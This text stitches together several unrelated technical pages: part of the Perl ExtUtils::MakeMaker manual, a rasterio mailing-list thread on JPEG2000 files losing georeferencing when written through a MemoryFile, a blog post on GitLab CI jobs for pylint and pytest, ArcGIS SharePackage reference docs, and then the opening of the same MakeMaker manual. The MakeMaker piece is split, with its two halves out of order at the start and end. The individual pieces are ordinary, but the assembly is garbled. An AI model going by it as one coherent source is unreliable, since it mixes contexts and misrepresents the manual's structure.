Instead of specifying the VERSION in the Makefile.PL you can let MakeMaker parse a file to determine the version number. The parsing routine requires that the file named by VERSION_FROM contains one single line to compute the version number. The first line in the file that contains something like a $VERSION assignment or package Name VERSION will be used. The following lines will be parsed o.k.:
# Good
package Foo::Bar 1.23; # 1.23
$VERSION = '1.00'; # 1.00
*VERSION = \'1.01'; # 1.01
($VERSION) = q$Revision$ =~ /(\d+)/g; # The digits in $Revision$
$FOO::VERSION = '1.10'; # 1.10
*FOO::VERSION = \'1.11'; # 1.11
but these will fail:
# Bad
my $VERSION = '1.01';
local $VERSION = '1.02';
local $FOO::VERSION = '1.30';
(Putting my or local on the preceding line will work o.k.)
"Version strings" are incompatible and should not be used.
# Bad
$VERSION = 1.2.3;
$VERSION = v1.2.3;
version objects are fine. As of MakeMaker 6.35, version.pm will be automatically loaded, but you must declare the dependency on version.pm. For compatibility with older MakeMaker you should load version.pm on the same line as $VERSION is declared.
# All on one line
use version; our $VERSION = qv(1.2.3);
The file named in VERSION_FROM is not added as a dependency to Makefile. This is not really correct, but it would be a major pain during development to have to rewrite the Makefile for any smallish change in that file. If you want to make sure that the Makefile contains the correct VERSION macro after any change of the file, you would have to do something like
depend => { Makefile => '$(VERSION_FROM)' }
See attribute depend below.
A sanitized VERSION with . replaced by _. For places where . has special meaning (some filesystems, RCS labels, etc...)
Hashref of .xs files. MakeMaker will default this. e.g.
{'name_of_file.xs' => 'name_of_file.c'}
The .c files will automatically be included in the list of files deleted by a make clean.
String of options to pass to xsubpp. This might include -C++ or -extern. Do not include typemaps here; the TYPEMAP parameter exists for that purpose.
May be set to -prototypes, -noprototypes or the empty string. The empty string is equivalent to the xsubpp default, or -noprototypes. See the xsubpp documentation for details. MakeMaker defaults to the empty string.
Your version number for the .xs file of this package. This defaults to the value of the VERSION attribute.
can be used to pass parameters to the methods which implement that part of the Makefile. Parameters are specified as a hash ref but are passed to the method as a hash.
{FILES => "*.xyz foo"}
{ANY_TARGET => ANY_DEPENDENCY, ...}
(ANY_TARGET must not be given a double-colon rule by MakeMaker.)
{TARFLAGS => 'cvfF', COMPRESS => 'gzip', SUFFIX => '.gz',
SHAR => 'shar -m', DIST_CP => 'ln', ZIP => '/bin/zip',
ZIPFLAGS => '-rl', DIST_DEFAULT => 'private tardist' }
If you specify COMPRESS, then SUFFIX should also be altered, as it is needed to tell make the target file of the compression. Setting DIST_CP to ln can be useful, if you need to preserve the timestamps on your files. DIST_CP can take the values 'cp', which copies the file, 'ln', which links the file, and 'best' which copies symbolic links and links the rest. Default is 'best'.
{ARMAYBE => 'ar', OTHERLDFLAGS => '...', INST_DYNAMIC_DEP => '...'}
{LINKTYPE => 'static', 'dynamic' or ''}
NB: Extensions that have nothing but *.pm files had to say
{LINKTYPE => ''}
with Pre-5.0 MakeMakers. Since version 5.00 of MakeMaker such a line can be deleted safely. MakeMaker recognizes when there's nothing to be linked.
{ANY_MACRO => ANY_VALUE, ...}
Anything put here will be passed to MY::postamble() if you have one.
{FILES => '$(INST_ARCHAUTODIR)/*.xyz'}
Specify the targets for testing.
{TESTS => 't/*.t'}
RECURSIVE_TEST_FILES can be used to include all directories recursively under t that contain .t files. It will be ignored if you provide your own TESTS attribute, defaults to false.
{RECURSIVE_TEST_FILES=>1}
{MAXLEN => 8}
If you cannot achieve the desired Makefile behaviour by specifying attributes you may define private subroutines in the Makefile.PL. Each subroutine returns the text it wishes to have written to the Makefile. To override a section of the Makefile you can either say:
sub MY::c_o { "new literal text" }
or you can edit the default by saying something like:
package MY; # so that "SUPER" works right
sub c_o {
    my $inherited = shift->SUPER::c_o(@_);
    $inherited =~ s/old text/new text/;
    $inherited;
}
If you are running experiments with embedding perl as a library into other applications, you might find MakeMaker is not sufficient. You'd better have a look at ExtUtils::Embed which is a collection of utilities for embedding.
If you still need a different solution, try to develop another subroutine that fits your needs and submit the diffs to makemaker@perl.org
For a complete description of all MakeMaker methods see ExtUtils::MM_Unix.
Here is a simple example of how to add a new target to the generated Makefile:
sub MY::postamble {
    return <<'MAKE_FRAG';
$(MYEXTLIB): sdbm/Makefile
	cd sdbm && $(MAKE) all
MAKE_FRAG
}
WriteMakefile() now does some basic sanity checks on its parameters to protect against typos and malformatted values. This means some things which happened to work in the past will now throw warnings and possibly produce internal errors.
Some of the most common mistakes:
MAN3PODS => ' '
This is commonly used to suppress the creation of man pages. MAN3PODS takes a hash ref not a string, but the above worked by accident in old versions of MakeMaker.
The correct code is MAN3PODS => { }.
MakeMaker.pm uses the architecture-specific information from Config.pm. In addition it evaluates architecture specific hints files in a hints/ directory. The hints files are expected to be named like their counterparts in PERL_SRC/hints, but with a .pl file name extension (eg. next_3_2.pl). They are simply evaled by MakeMaker within the WriteMakefile() subroutine, and can be used to execute commands as well as to include special variables. The rules which hintsfile is chosen are the same as in Configure.
The hintsfile is eval()ed immediately after the arguments given to WriteMakefile are stuffed into a hash reference $self but before this reference becomes blessed. So if you want to do the equivalent to override or create an attribute you would say something like
$self->{LIBS} = ['-ldbm -lucb -lc'];
For authors of extensions MakeMaker provides several Makefile targets. Most of the support comes from the ExtUtils::Manifest module, where additional documentation can be found.
reports which files are below the build directory but not in the MANIFEST file and vice versa. (See ExtUtils::Manifest::fullcheck() for details)
reports which files are skipped due to the entries in the MANIFEST.SKIP file (See ExtUtils::Manifest::skipcheck() for details)
does a realclean first and then the distcheck. Note that this is not needed to build a new distribution as long as you are sure that the MANIFEST file is ok.
does a realclean first and then removes backup files such as *~, *.bak, *.old and *.orig
rewrites the MANIFEST file, adding all remaining files found (See ExtUtils::Manifest::mkmanifest() for details)
Copies all the files that are in the MANIFEST file to a newly created directory with the name $(DISTNAME)-$(VERSION). If that directory exists, it will be removed first.
Additionally, it will create META.yml and META.json module meta-data file in the distdir and add this to the distdir's MANIFEST. You can shut this behavior off with the NO_META flag.
Makes a distdir first, and runs a perl Makefile.PL, a make, and a make test in that directory.
First does a distdir. Then a command $(PREOP) which defaults to a null command, followed by $(TO_UNIX), which defaults to a null command under UNIX, and will convert files in distribution directory to UNIX format otherwise. Next it runs tar on that directory into a tarfile and deletes the directory. Finishes with a command $(POSTOP) which defaults to a null command.
Defaults to $(DIST_DEFAULT) which in turn defaults to tardist.
Runs a tardist first and uuencodes the tarfile.
First does a distdir. Then a command $(PREOP) which defaults to a null command. Next it runs shar on that directory into a sharfile and deletes the intermediate directory again. Finishes with a command $(POSTOP) which defaults to a null command. Note: For shdist to work properly a shar program that can handle directories is mandatory.
First does a distdir. Then a command $(PREOP) which defaults to a null command. Runs $(ZIP) $(ZIPFLAGS) on that directory into a zipfile. Then deletes that directory. Finishes with a command $(POSTOP) which defaults to a null command.
Does a $(CI) and a $(RCS_LABEL) on all files in the MANIFEST file.
Customization of the dist targets can be done by specifying a hash reference to the dist attribute of the WriteMakefile call. The following parameters are recognized:
CI ('ci -u')
COMPRESS ('gzip --best')
POSTOP ('@ :')
PREOP ('@ :')
TO_UNIX (depends on the system)
RCS_LABEL ('rcs -q -Nv$(VERSION_SYM):')
SHAR ('shar')
SUFFIX ('.gz')
TAR ('tar')
TARFLAGS ('cvf')
ZIP ('zip')
ZIPFLAGS ('-r')
An example:
WriteMakefile(
    ...other options...
    dist => {
        COMPRESS => "bzip2",
        SUFFIX => ".bz2"
    }
);
A problem that has long plagued users of MakeMaker-based modules is getting basic information about the module out of the sources without running the Makefile.PL and doing a bunch of messy heuristics on the resulting Makefile. Over the years, it has become standard to keep this information in one or more CPAN Meta files distributed with each distribution.
The original format of CPAN Meta files was YAML and the corresponding file was called META.yml. In 2010, version 2 of the CPAN::Meta::Spec was released, which mandates JSON format for the metadata in order to overcome certain compatibility issues between YAML serializers and to avoid breaking older clients unable to handle a new version of the spec. The CPAN::Meta library is now standard for accessing old and new-style Meta files.
If CPAN::Meta is installed, MakeMaker will automatically generate META.json and META.yml files for you and add them to your MANIFEST as part of the 'distdir' target (and thus the 'dist' target). This is intended to seamlessly and rapidly populate CPAN with module meta-data. If you wish to shut this feature off, set the NO_META WriteMakefile() flag to true.
At the 2008 QA Hackathon in Oslo, Perl module toolchain maintainers agreed to use the CPAN Meta format to communicate post-configuration requirements between toolchain components. These files, MYMETA.json and MYMETA.yml, are generated when Makefile.PL generates a Makefile (if CPAN::Meta is installed). Clients like CPAN or CPANPLUS will read these files to see what prerequisites must be fulfilled before building or testing the distribution. If you wish to shut this feature off, set the NO_MYMETA WriteMakefile() flag to true.
If some events detected in Makefile.PL imply that there is no way to create the Module, but this is a normal state of things, then you can create a Makefile which does nothing, but succeeds on all the "usual" build targets. To do so, use
use ExtUtils::MakeMaker qw(WriteEmptyMakefile);
WriteEmptyMakefile();
instead of WriteMakefile().
This may be useful if other modules expect this module to be built OK, as opposed to work OK (say, this system-dependent module builds in a subdirectory of some other distribution, or is listed as a dependency in a CPAN::Bundle, but the functionality is supported by different means on the current architecture).
my $value = prompt($message);
my $value = prompt($message, $default);
The prompt() function provides an easy way to request user input used to write a makefile. It displays the $message as a prompt for input. If a $default is provided it will be used as a default. The function returns the $value selected by the user.
If prompt() detects that it is not running interactively and there is nothing on STDIN or if the PERL_MM_USE_DEFAULT environment variable is set to true, the $default will be used without prompting. This prevents automated processes from blocking on user input.
If no $default is provided an empty string will be used instead.
Command line options used by MakeMaker->new(), and thus by WriteMakefile(). The string is split as the shell would, and the result is processed before any actual command line arguments are processed.
PERL_MM_OPT='CCFLAGS="-Wl,-rpath -Wl,/foo/bar/lib" LIBS="-lwibble -lwobble"'
If set to a true value then MakeMaker's prompt function will always return the default without waiting for user input.
Same as the PERL_CORE parameter. The parameter overrides this.
Module::Build is a pure-Perl alternative to MakeMaker which does not rely on make or any other external utility. It is easier to extend to suit your needs.
Module::Install is a wrapper around MakeMaker which adds features not normally available.
Andy Dougherty doughera@lafayette.edu, Andreas König andreas.koenig@mind.de, Tim Bunce timb@cpan.org. VMS support by Charles Bailey bailey@newman.upenn.edu. OS/2 support by Ilya Zakharevich ilya@math.ohio-state.edu.
Currently maintained by Michael G Schwern schwern@pobox.com
Send patches and ideas to makemaker@perl.org.
Send bug reports via http://rt.cpan.org/. Please send your generated Makefile along with your report.
For more up-to-date information, see https://metacpan.org/release/ExtUtils-MakeMaker.
Repository available at https://github.com/Perl-Toolchain-Gang/ExtUtils-MakeMaker.
This program is free software; you can redistribute it and/or modify it under the same terms as Perl itself.
|
MemoryFile loses Profile information
ciaran.evans@...
Hi there,
I'm currently re-writing a process that was stacking .jp2 bands into one image and writing the resultant stack to disk.
I'm moving this up to AWS, so I want to use MemoryFiles instead.
My code looks something like:
s3_r = boto3.resource('s3')
If I download that image and open it in QGIS, the image has no geo-coding at all.
If I process the same image, but write to disk like:
profile = source_image.profile.copy()
I get a geo-coded image and it appears where I'd expect.
ciaran.evans@...
On further inspection, when I switched to saving my outputs as GeoTIFF, the resultant images are both geo-coded fine (Disk vs. In Memory to S3).
I'm guessing something is going wrong when the .jp2 is written through the MemoryFile.
Any suggestions on next steps?
ciaran.evans@...
Revised: Don't require the seek after writing:
import boto3
import rasterio

# source_image is an already-open rasterio dataset (the .jp2 band being copied)
s3_r = boto3.resource('s3')
profile = source_image.profile.copy()

with rasterio.io.MemoryFile() as stack:
    with stack.open(**profile) as stack_out:
        stack_out.write(source_image.read(1), 1)
    s3_r.Object(<my-bucket>, <my-key>).upload_fileobj(stack)
For reference, doing:
s3_r = boto3.resource('s3')
profile = source_image.profile.copy()

with rasterio.io.MemoryFile() as stack:
    profile['driver'] = 'GTiff'
    with stack.open(**profile) as stack_out:
        stack_out.write(source_image.read(1), 1)
    s3_r.Object(<my-bucket>, <my-key>).upload_fileobj(stack)
results in a correctly geocoded GeoTiff. Appears it is an issue with writing JPEG2000 (.jp2) through a MemoryFile.
vincent.sarago@...
I can confirm that writing a Jpeg2000 from memory loses the geo information
ciaran.evans@...
I tried this with GDAL 2.4.2 and GDAL 3.0 too
If anyone can point me to where I might look further to diagnose this, I can create an issue with some useful info, whether that's in Rasterio/GDAL :)
Sean Gillies
Hi,
On Tue, Apr 28, 2020 at 8:02 AM <ciaran.evans@...> wrote:
To confirm: you're right, there's no need to seek after writing using mem.write() because the dataset API doesn't change the MemoryFile's stream position. It remains at 0, the beginning of the file.
Is it possible that your B01.jp2 has auxiliary files? If so, they can be lost because MemoryFile.read() only returns bytes from the primary file and will overlook auxiliaries. For example, see the code below using rasterio's test data.
$ rio insp tests/data/RGB.byte.tif
>>> from rasterio.io import MemoryFile
>>> profile = src.profile
>>> del profile["tiled"]
>>> del profile["interleave"]
>>> profile["driver"] = "PNG"
>>> with MemoryFile(filename="lolwut.png") as memfile:
...     with memfile.open(**profile) as dataset_1:
...         dataset_1.write(src.read())
...         print(dataset_1.files)
...         print(dataset_1.profile)
...     with memfile.open() as dataset_2:
...         print(dataset_2.files)
...         print(dataset_2.profile)
...     with open("/tmp/lolwut.png", "wb") as f:
...         f.write(memfile.read())
...     with rasterio.open("/tmp/lolwut.png") as dataset_3:
...         print(dataset_3.files)
...         print(dataset_3.profile)
...
[]
{'driver': 'PNG', 'dtype': 'uint8', 'nodata': 0.0, 'width': 791, 'height': 718, 'count': 3, 'crs': CRS.from_epsg(32618), 'transform': Affine(300.0379266750948, 0.0, 101985.0,
0.0, -300.041782729805, 2826915.0), 'tiled': False}
['/vsimem/lolwut.png', '/vsimem/lolwut.png.aux.xml']
{'driver': 'PNG', 'dtype': 'uint8', 'nodata': 0.0, 'width': 791, 'height': 718, 'count': 3, 'crs': CRS.from_epsg(32618), 'transform': Affine(300.0379266750948, 0.0, 101985.0,
0.0, -300.041782729805, 2826915.0), 'tiled': False, 'interleave': 'pixel'}
775558
['/tmp/lolwut.png']
{'driver': 'PNG', 'dtype': 'uint8', 'nodata': 0.0, 'width': 791, 'height': 718, 'count': 3, 'crs': None, 'transform': Affine(1.0, 0.0, 0.0,
0.0, 1.0, 0.0), 'tiled': False, 'interleave': 'pixel'}
dataset_1.files is an empty list because no files are written to the /vsimem virtual filesystem until dataset_1 is closed.
dataset_2.files shows two files: the primary /vsimem/lolwut.png file and its auxiliary '/vsimem/lolwut.png.aux.xml' file, containing the georeferencing information.
dataset_3.files shows only one file; the auxiliary file has been lost by memfile.read(). MemoryFile isn't any good for multiple-file formats or multiple-file format variants. It's fine for a profile of GeoTIFFs that keep their georeferencing and masks and overviews in a single file.
Sean Gillies
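For reference, here is a minimal round-trip sketch (not from the original thread) of the single-file GeoTIFF case described above; it assumes rasterio is installed and uses its bundled test raster, the same tests/data/RGB.byte.tif as in the transcript:
import rasterio
from rasterio.io import MemoryFile

# Read a single-file GeoTIFF and push it through a MemoryFile.
with rasterio.open("tests/data/RGB.byte.tif") as src:
    profile = src.profile
    data = src.read()

with MemoryFile() as memfile:
    with memfile.open(**profile) as dst:
        dst.write(data)
    # Re-open from the same in-memory file: CRS and transform survive, because
    # GeoTIFF keeps its georeferencing in the primary file rather than in a
    # .aux.xml side-car.
    with memfile.open() as check:
        print(check.crs, check.transform)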
Guillaume Lostis
Hi,
I guess the B01.jp2 file mentioned is a Sentinel-2 band, which is standalone; there is no side-car file attached to it.
I have tried downloading a single B01.jp2 file from a SAFE and running Vincent Sarago's snippet on it and I get the same result, the CRS and transform are lost when the jp2 is written through a MemoryFile.
Guillaume Lostis
ciaran.evans@...
As with Guillaume's answer, it's a Sentinel-2 band and has no side-car file; when I write straight to a file, the georeferencing is maintained.
Sean Gillies
On Wed, Apr 29, 2020 at 1:38 AM <ciaran.evans@...> wrote:
Since there's no JP2 specific code in MemoryFile and things work with the GeoTIFF driver, I suspect there's a subtle bug involving the vsimem system and one of the JP2 drivers. It would be useful to try to reproduce this with GDAL's Python bindings, but I don't have them installed and won't be able to try that.
Sean Gillies
ciaran.evans@...
Would you say it's worth raising an issue on GDAL then?
I'm also not familiar with the Python GDAL bindings; Rasterio is my window into that, haha.
Guillaume Lostis
Like Ciaran I'm not very familiar with GDAL's python bindings, but I've tried running a little snippet which I believe does the same thing as what was done with rasterio: it writes a JP2 to a vsimem in-memory file, and then writes the bytes to a file on disk.
from osgeo import gdal
mem, out = "/vsimem/B01.jp2", "new_B01.jp2"
gdal.Translate(mem, "B01.jp2")
# Taken from https://lists.osgeo.org/pipermail/gdal-dev/2016-August/045030.html
f = gdal.VSIFOpenL(mem, "rb")
gdal.VSIFSeekL(f, 0, 2) # seek to end
size = gdal.VSIFTellL(f)
gdal.VSIFSeekL(f, 0, 0) # seek to beginning
data = gdal.VSIFReadL(1, size, f)
gdal.Unlink(mem)
with open(out, "wb") as ff:
    ff.write(data)
When I look at the `gdalinfo` of `new_B01.jp2`, it has a CRS and a transform, so I am not able to reproduce the behavior we have with `rasterio`.
(Side note: Interestingly enough, the pixel values of `new_B01.jp2` have slightly changed with respect to the original `B01.jp2` file, so there is some data loss somewhere in the process. But maybe that is expected of the JP2 format and could be avoided by passing extra arguments to `gdal.Translate`?)
Guillaume
Even Rouault
On Wednesday 29 April 2020 08:40:07 CEST Guillaume Lostis wrote:
By default, the JP2OpenJPEG driver uses lossy compression (my personal take on JPEG2000 is that it has very limited interest when used in its lossless profile; better to use more conventional algorithms that are way faster).
See https://gdal.org/drivers/raster/jp2openjpeg.html#lossless-compression for options to pass to get a lossless JPEG2000 as output.
So all in all that should be something like
gdal.Translate(mem, "B01.jp2",
               format = "JP2OpenJPEG",  # in case you have several JP2K drivers available
               options = ["REVERSIBLE=YES", "QUALITY=100"])
--
Spatialys - Geospatial professional services
http://www.spatialys.com
Sean Gillies
Hi,
On Wed, Apr 29, 2020 at 9:40 AM Guillaume Lostis <g.lostis@...> wrote:
I've only now remembered (not being a regular jp2 user) that JPEG2000 is a create-copy format (see https://gdal.org/drivers/raster/index.html) and as such is not suited for use cases like
with rasterio.open("file.jp2", "w", driver="JP2OpenJPEG", ...) as dataset:
    dataset.write(data)
Rasterio tries to abstract over the differences between "create" and "create-copy" formats, but might falter in some cases. We're testing JPEG and PNG in the test suite, but not JPEG2000. If you're constructing a dataset from the bands of multiple other datasets, you should probably be using GeoTIFF as the format; it's well suited for this. And then convert to JPEG2000 before uploading to S3 using rasterio.shutil.copy, which calls on GDAL's GDALCreateCopy and is mostly equivalent to gdal_translate.
Sean Gillies
ciaran.evans@...
I think the problem is that I'm trying to do the conversion in memory, not on disk. If I've read your latest reply correctly, I'd convert to JPEG2000 on disk and then copy to S3?
Can I do the conversion via rasterio.shutil.copy in memory?
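A minimal, disk-based sketch of the workflow suggested above (path names, bucket and key are hypothetical, and B01.jp2 stands in for the input band): build the output as a GeoTIFF, convert it to JPEG2000 with rasterio.shutil.copy, then upload the converted file to S3.
import boto3
import rasterio
import rasterio.shutil

s3_r = boto3.resource("s3")

# 1. Write the output as a GeoTIFF -- a single-file format that keeps its
#    georeferencing, masks and overviews in the primary file.
with rasterio.open("B01.jp2") as source_image:            # hypothetical input band
    data = source_image.read(1)
    profile = source_image.profile.copy()
    profile.update(driver="GTiff")
    with rasterio.open("/tmp/stack.tif", "w", **profile) as stack_out:
        stack_out.write(data, 1)

# 2. Convert the GeoTIFF to JPEG2000 (a create-copy format); rasterio.shutil.copy
#    calls GDAL's GDALCreateCopy, much like gdal_translate.
rasterio.shutil.copy("/tmp/stack.tif", "/tmp/stack.jp2", driver="JP2OpenJPEG")

# 3. Upload the converted file to S3 (hypothetical bucket/key).
s3_r.Object("my-bucket", "stacks/stack.jp2").upload_file("/tmp/stack.jp2")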
|
Mar 6, 2019 by Thibault | 10166 views
Whatever programming language you are using for your project, GitLab's continuous integration system (gitlab-ci) is a fantastic tool that allows you to automatically run tests when code is pushed to your repository. Java, PHP, Go, Python or even LaTeX, no limit here! In this blog post we review a few examples for the Python programming language.
In GitLab, the different tests are called jobs. These jobs are executed by a gitlab-runner, which can be installed on the same server as your main GitLab, or on one or multiple separate servers.
Different options exist to run the jobs: using VirtualBox virtual machines, using Docker containers or using no virtualization at all. Most administrators configure gitlab-runner to run jobs using Docker images. This is also what we will assume for the remainder of this post.
To automatically check your code when you push to your repository, add a file called .gitlab-ci.yml at the root of your project with following content:
test:pylint:
  image: python:3.6
  script:
    - pip install pylint --quiet
    - pylint --ignored-classes=_socketobject *.py
test:pylint is simply the name of the job. You can choose whatever you want. The rest of the code indicates that gitlab-runner should use the docker image python:3.6, and run the mentioned commands.
When using some external classes (like sockets), PyLint may complain that the used method does not exist, although the method does actually exist. You can ignore these errors by appending --ignored-classes=... to the pylint command line.
You can also specify a directory (instead of *.py), but it must be a Python module and include __init__.py.
Good to know: Pylint is shipped with Pyreverse which creates UML diagrams from python code.
PyTest is a framework designed to help you test your Python code. Here is an example of a test:
# content of test_sample.py
def func(x):
    return x + 1

def test_answer():
    assert func(3) == 5  # this assertion fails: func(3) returns 4
To run these tests automatically when you push code to your repository, add the following job to your .gitlab-ci.yml.
test:pytest:
  image: python:3.6
  script:
    - pip install pytest --quiet
    - pytest
pytest will automatically discover all test files in your project (all files named test_*.py or *_test.py) and execute them.
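As a further illustration of this discovery rule (not from the original post; the file and function names are made up), a parametrized test in a file named test_parametrize.py is picked up and run the same way:
# content of test_parametrize.py
import pytest

def add_one(x):
    return x + 1

@pytest.mark.parametrize("value, expected", [(1, 2), (3, 4), (-1, 0)])
def test_add_one(value, expected):
    assert add_one(value) == expected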
One of the main benefits of automatic testing with gitlab-ci is that you can test multiple versions of Python at the same time. There is however one caveat: if you plan to test your code with both Python 2 and Python 3, you will at least need to disable the superfluous-parens check in Python 2 (for the print statement, which became a function in Python 3). Here is a full example of .gitlab-ci.yml:
test:pylint:36:
  image: python:3.6
  script:
    - pip install pylint --quiet
    - pylint --ignored-classes=_socketobject *.py

test:pytest:36:
  image: python:3.6
  script:
    - pip install pytest --quiet
    - pytest

test:pylint:27:
  image: python:2.7
  script:
    - pip install pylint --quiet
    - pylint --disable superfluous-parens --ignored-classes=_socketobject *.py

test:pytest:27:
  image: python:2.7
  script:
    - pip install pytest --quiet
    - pytest
|
Summary
Shares a package by uploading it to ArcGIS Online.
Usage
The supported package types are:
geoprocessing packages (.gpk)
layer packages (.lpk)
locator packages (.gcpk)
map packages (.mpk)
tile packages (.tpk)
To share a package on ArcGIS Online, your Esri Global Account must be registered as a member of ArcGIS Online. To create and register an Esri Global Account, go to http://www.arcgis.com/home/signup.html
A summary and tags are required to share a package with ArcGIS Online. The required summary and tags, along with the optional package description and credits, make it possible to search for packages online.
If a package with the same name already exists on ArcGIS Online, it is replaced.
Syntax
SharePackage(in_package, username, password, summary, tags, {credits}, {public}, {groups})
Parameter    Explanation    Data Type
in_package
The input layer (.lpk), map (.mpk), geoprocessing (.gpk), tile (.tpk), or address locator (.gcpk) package file.
File
username
The Esri Global Account username. Use of this parameter is limited in a Python script when sharing a package to a portal that requires OAuth 2.0 authentication. See the usage notes to learn more.
String
password
The Esri Global Account password. Use of this parameter is limited in a Python script when sharing a package to a portal that requires OAuth 2.0 authentication. See the usage notes to learn more.
Encrypted String
summary
The summary of the package. The summary is displayed in the item information of the package on ArcGIS.com.
String
tags
The tags used to describe and identify the package. Individual tags are separated with a comma or semicolon.
String
credits
(Optional)
The credits for the package. This is generally the name of the organization that is given credit for creating and providing the content for the package.
String
public
(Optional)
Specifies whether the input package will be shared with and available to everybody.
Boolean
groups
[group_name,...]
(Optional)
A list of groups to share the package with.
String
Derived Output
Name    Explanation    Data Type
out_results
Indicates whether the package was shared successfully.
Boolean
Code sample
SharePackage example 1 (Python window)
The following script takes a layer package and shares it on ArcGIS Online.
import arcpy
arcpy.SharePackage_management(r"C:\states.lpk", "username", "password",
                              "this is a summary", "tag1, tag2",
                              "Credits", "MYGROUPS", "My_Group")
SharePackage example 2 (stand-alone Python script)
Finds all the map packages that reside in a specified folder and shares them on ArcGIS Online.
# Name: SharePackageExample.py
# Description: Find all the map packages that reside in a specified folder
#              and share them on ArcGIS Online.

# Import system modules
import arcpy

# Set environment settings
arcpy.env.overwriteOutput = True
arcpy.env.workspace = "C:/data/my_packages"

# Loop through the workspace, find all the layer and map packages
for mpk in arcpy.ListFiles("*.mpk"):
    print("Sharing " + mpk)
    arcpy.SharePackage_management(mpk, "username", "password",
                                  "This is a summary", "tag1, tag2",
                                  "Credits", "MYGROUPS", "My_Group")
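A small variation on example 2 (same hypothetical folder), sketched here to also cover the layer packages (.lpk) that the script's comment mentions; the `or []` guards are only there in case nothing matches:
import arcpy

arcpy.env.overwriteOutput = True
arcpy.env.workspace = "C:/data/my_packages"

# Share every layer (.lpk) and map (.mpk) package found in the workspace
packages = (arcpy.ListFiles("*.lpk") or []) + (arcpy.ListFiles("*.mpk") or [])
for pkg in packages:
    print("Sharing " + pkg)
    arcpy.SharePackage_management(pkg, "username", "password",
                                  "This is a summary", "tag1, tag2",
                                  "Credits", "MYGROUPS", "My_Group")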
Environments
Licensing information
Basic: Yes
Standard: Yes
Advanced: Yes
|
ExtUtils::MakeMaker - Create a module Makefile
use ExtUtils::MakeMaker;
WriteMakefile(
NAME => "Foo::Bar",
VERSION_FROM => "lib/Foo/Bar.pm",
);
This utility is designed to write a Makefile for an extension module from a Makefile.PL. It is based on the Makefile.SH model provided by Andy Dougherty and the perl5-porters.
It splits the task of generating the Makefile into several subroutines that can be individually overridden. Each subroutine returns the text it wishes to have written to the Makefile.
As there are various Make programs with incompatible syntax, which use operating system shells, again with incompatible syntax, it is important for users of this module to know which flavour of Make a Makefile has been written for so they'll use the correct one and won't have to face the possibly bewildering errors resulting from using the wrong one.
On POSIX systems, that program will likely be GNU Make; on Microsoft Windows, it will be either Microsoft NMake, DMake or GNU Make. See the section on the "MAKE" parameter for details.
ExtUtils::MakeMaker (EUMM) is object oriented. Each directory below the current directory that contains a Makefile.PL is treated as a separate object. This makes it possible to write an unlimited number of Makefiles with a single invocation of WriteMakefile().
All inputs to WriteMakefile are Unicode characters, not just octets. EUMM seeks to handle all of these correctly. It is currently still not possible to portably use Unicode characters in module names, because this requires Perl to handle Unicode filenames, which is not yet the case on Windows.
The long answer is the rest of the manpage :-)
The generated Makefile enables the user of the extension to invoke
perl Makefile.PL # optionally "perl Makefile.PL verbose"
make
make test # optionally set TEST_VERBOSE=1
make install # See below
The Makefile to be produced may be altered by adding arguments of the form KEY=VALUE. E.g.
perl Makefile.PL INSTALL_BASE=~
Other interesting targets in the generated Makefile are
make config # to check if the Makefile is up-to-date
make clean # delete local temp files (Makefile gets renamed)
make realclean # delete derived files (including ./blib)
make ci # check in all the files in the MANIFEST file
make dist # see below the Distribution Support section
MakeMaker checks for the existence of a file named test.pl in the current directory, and if it exists it executes the script with the proper set of perl -I options.
MakeMaker also checks for any files matching glob("t/*.t"). It will execute all matching files in alphabetical order via the Test::Harness module with the -I switches set correctly.
If you'd like to see the raw output of your tests, set the TEST_VERBOSE variable to true.
make test TEST_VERBOSE=1
If you want to run particular test files, set the TEST_FILES variable. It is possible to use globbing with this mechanism.
make test TEST_FILES='t/foobar.t t/dagobah*.t'
Windows users who are using nmake should note that due to a bug in nmake, when specifying TEST_FILES you must use back-slashes instead of forward-slashes.
nmake test TEST_FILES='t\foobar.t t\dagobah*.t'
A useful variation of the above is the target testdb. It runs the test under the Perl debugger (see perldebug). If the file test.pl exists in the current directory, it is used for the test.
If you want to debug some other testfile, set the TEST_FILE variable thusly:
make testdb TEST_FILE=t/mytest.t
By default the debugger is called using -d option to perl. If you want to specify some other option, set the TESTDB_SW variable:
make testdb TESTDB_SW=-Dx
make alone puts all relevant files into directories that are named by the macros INST_LIB, INST_ARCHLIB, INST_SCRIPT, INST_MAN1DIR and INST_MAN3DIR. All these default to something below ./blib if you are not building below the perl source directory. If you are building below the perl source, INST_LIB and INST_ARCHLIB default to ../../lib, and INST_SCRIPT is not defined.
The install target of the generated Makefile copies the files found below each of the INST_* directories to their INSTALL* counterparts. Which counterparts are chosen depends on the setting of INSTALLDIRS according to the following table:
                        INSTALLDIRS set to
                    perl            site                 vendor

                PERLPREFIX      SITEPREFIX           VENDORPREFIX
INST_ARCHLIB    INSTALLARCHLIB  INSTALLSITEARCH      INSTALLVENDORARCH
INST_LIB        INSTALLPRIVLIB  INSTALLSITELIB       INSTALLVENDORLIB
INST_BIN        INSTALLBIN      INSTALLSITEBIN       INSTALLVENDORBIN
INST_SCRIPT     INSTALLSCRIPT   INSTALLSITESCRIPT    INSTALLVENDORSCRIPT
INST_MAN1DIR    INSTALLMAN1DIR  INSTALLSITEMAN1DIR   INSTALLVENDORMAN1DIR
INST_MAN3DIR    INSTALLMAN3DIR  INSTALLSITEMAN3DIR   INSTALLVENDORMAN3DIR
The INSTALL... macros in turn default to their %Config ($Config{installprivlib}, $Config{installarchlib}, etc.) counterparts.
You can check the values of these variables on your system with
perl '-V:install.*'
And to check the sequence in which the library directories are searched by perl, run
perl -le 'print join $/, @INC'
Sometimes older versions of the module you're installing live in other directories in @INC. Because Perl loads the first version of a module it finds, not the newest, you might accidentally get one of these older versions even after installing a brand new version. To delete all other versions of the module you're installing (not simply older ones) set the UNINST variable.
make install UNINST=1
INSTALL_BASE can be passed into Makefile.PL to change where your module will be installed. INSTALL_BASE is more like what everyone else calls "prefix" than PREFIX is.
To have everything installed in your home directory, do the following.
# Unix users, INSTALL_BASE=~ works fine
perl Makefile.PL INSTALL_BASE=/path/to/your/home/dir
Like PREFIX, it sets several INSTALL* attributes at once. Unlike PREFIX it is easy to predict where the module will end up. The installation pattern looks like this:
INSTALLARCHLIB INSTALL_BASE/lib/perl5/$Config{archname}
INSTALLPRIVLIB INSTALL_BASE/lib/perl5
INSTALLBIN INSTALL_BASE/bin
INSTALLSCRIPT INSTALL_BASE/bin
INSTALLMAN1DIR INSTALL_BASE/man/man1
INSTALLMAN3DIR INSTALL_BASE/man/man3
